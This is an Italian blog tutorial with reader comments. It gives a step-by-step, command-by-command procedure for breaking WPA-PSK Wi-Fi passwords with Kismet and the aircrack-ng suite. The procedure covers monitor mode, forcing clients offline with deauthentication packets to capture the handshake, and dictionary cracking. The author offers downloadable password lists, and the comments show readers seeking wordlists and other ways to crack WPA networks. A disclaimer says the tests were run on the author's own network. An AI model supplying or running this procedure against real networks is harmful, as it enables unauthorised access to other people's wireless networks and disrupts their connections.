Home > Informatica, Linux, manuali, sicurezza > Tutorial – Aircrack-NG e wpa crack…quello vero!

Tutorial – Aircrack-NG e wpa crack…quello vero!

9 Novembre 2008 U-Black Lascia un commento Passa ai commenti

Come promesso in un mio precedente post ho scritto un piccolo tutorial per “test di sicurezza” effettuati sulle reti wireless. Il problema risulta sempre lo stesso, le chiavi wep possono essere facilmente scavalcate mentre quella wpa…

In questo tutorial vediamo qual’è il metodo per scavalcare, e badate bene, non dico “crackare” o “hackerare” una rete wireless con chiave wpa. Innanzitutto c’è da analizzare il problema vero e proprio, che è l’algoritmo che cifra la psk: è troppo complesso. Nel caso delle chiavi wep, basta mettersi in “ascolto”, usare l’interfaccia in monitor mode, catturare i pacchetti necessari, scovare il mac address di un client connesso all’AP e “fingersi” proprio come si fosse quel pc. In quel momento l’AP ritrasmetterà la richiesta sul nostro client con tanto di pacchetti necessari… e il gioco è fatto… (più o meno…perchè il numero di pacchetti necessari non è certo basso…).

Cmq tornando al discorso sul wpa, il problema della cifratura può essere più o meno scavalcato utilizzando un tipo di attacco chiamato “bruteforce dictionary attack“, che purtroppo funziona solo con wpa e wpa psk. Il tipo di attacco insomma si  basa nel “tentare” ricorsivamente l’uso di un dizionario per scovare la password di accesso alla rete. Gli strumenti necessari per questo tipo di azione sono:

  1. La suite di Aricrack-NG;
  2. Il pacchetto Kismet;
  3. Dizionario di password;

In primo luogo dobbiamo verificare se la nostra scheda wireless “cammina” con gli stessi parametri dell’AP, pertanto usiamo la suite Kismet per verificare ciò, selezioniamo il router e vediamo un pò di ricavare le informazioni che ci servono.

Fatto questo cambiamo i parametri della nostra scheda di rete in modo da “associarla” ai valori dell’AP:

# iwpriv eth1 mode 0 1 2 3 dove i numeri stanno a determinate modalità, 0=Automatic; 1=802.11a; 2=802.11b; 3=802.11g, ne scegliamo quindi uno, nel nostro caso sarà lo “0″(zero)

poi settiamo il rate della scheda…il problema è che in alcuni casi nonostante il rate di trasmissione sia uguale non riceviamo l’handshake, mentre settandola ad 1M…si dovrebbe ottenere qualcosa:

# iwconfig eth1 rate 1M

Fatti questi passetti possiamo mettere la nostra scheda di rete in monitor mode,:

# airmon-ng start eth1 7 (dove 7 è il canale in uso nel caso specifico)

Passiamo adesso alla cattura dell’handshake attraverso airodump-ng:

# airodump-ng -c 7 –bssid 00:1B:11:F0:E2:36 -w sniffizzezziamo eth1 (-c 7 è il canale dell’AP; bssid 00:1B:11:F0:E2:36 è il mac address dell’AP; -w sniffizzezziamo è il file sul quale verranno salvati i pacchetti).

Attendiamo che qualche pacchetto venga catturato e diamo il comando:

# aireplay-ng -0 5 -a 00:1B:11:F0:E2:36 -c 00:0e:35:a6:b1:ab eth1 (-0 è il deautantication mode; 5 il numero di pacchetti da mandare; -a 00:1B:11:F0:E2:36 è l’AP; -c 00:0e:35:a6:b1:ab è il pc da “autenticare”; eth1 è la scheda di rete).

Una volta che il client è stato disconnesso, tenterà di riautenticarsi producendo un output…ed è li che avvieremo:

# aircrack-ng -w dizionario -b 00:1B:11:F0:E2:36 sniffizzezziamo.cap (-w dizionario è il nome del file che conterrà le password; sniffizzezziamo.cap è il file con l’estenzione cap di airodump).

Queste sono le procedure per effettuare il crack della rete wpa.
L’output che avremo da Aircrack-NG sarà la password…

Ora, non è che tutti siamo così scemi da usare password semplici…magari qualche pass conterrà caratteri un pò più complessi.

Le distro utilizzate sono Black!Track Linux e Slackware Linux.

Tutti i test effettuati sono per puro e semplice motivo didattico, effettuati sulla rete wifi di casa mia, per scoprirne le vulnerabilità.

L’AP è un DLink DWL-G700AP, la scheda di rete è una ipw2200BG.

UPDATE Lunedì 10.11.08

Ho appena creato un file con dei dizionari password liberamente scaricabile da questo link. Nel file è incluso il sorgente di John The Ripper.

- COMUNICAZIONE DI SERVIZIO -

Se non riesci a scarcare il dizionario è perchè a causa delle numerosissime richieste il server U-CLAN va spesso giù. Sarà raggiungibile ogni giorno solo dalle 00.00 alle 08.00.

Per maggiori informazioni leggi questo post.

Categories: Informatica, Linux, manuali, sicurezza Tag:, , , , , , ,
  1. devilmanga
    18 Settembre 2009 alle 00:30 | #1
    Quota

    ciao.. mi sono connesso a mezzanotte e mezza.. ma non scarica il dizionario. puoi passarmelo in qualche altro modo?

  2. U-Black
    18 Settembre 2009 alle 01:33 | #2
    Quota

    ciao, il server è down da molto tempo, tra lavoro e altre cose non sto avendo tempo di rimetterlo su.
    Cmq…ti consiglio di cercare i dizionari sul mulo, li non è pieno…di più!

  3. devilmanga
    18 Settembre 2009 alle 08:48 | #3
    Quota

    puoi darmi qualche buon nome da cercare?

  4. U-Black
    18 Settembre 2009 alle 12:51 | #4
    Quota

    password list :|

  5. Giovanni
    18 Dicembre 2009 alle 13:03 | #5
    Quota

    Salve! Sto cercando il metodo di craccare le reti wpa tkip grazie ad un metodo scoperto non molto fa, senza l’utilizzo di brute force…

    Ecco una breve spiegazione: http://geektwice.com/craccare-una-rete-wpa-i-metodi-da-segnalare/

  1. No trackbacks yet.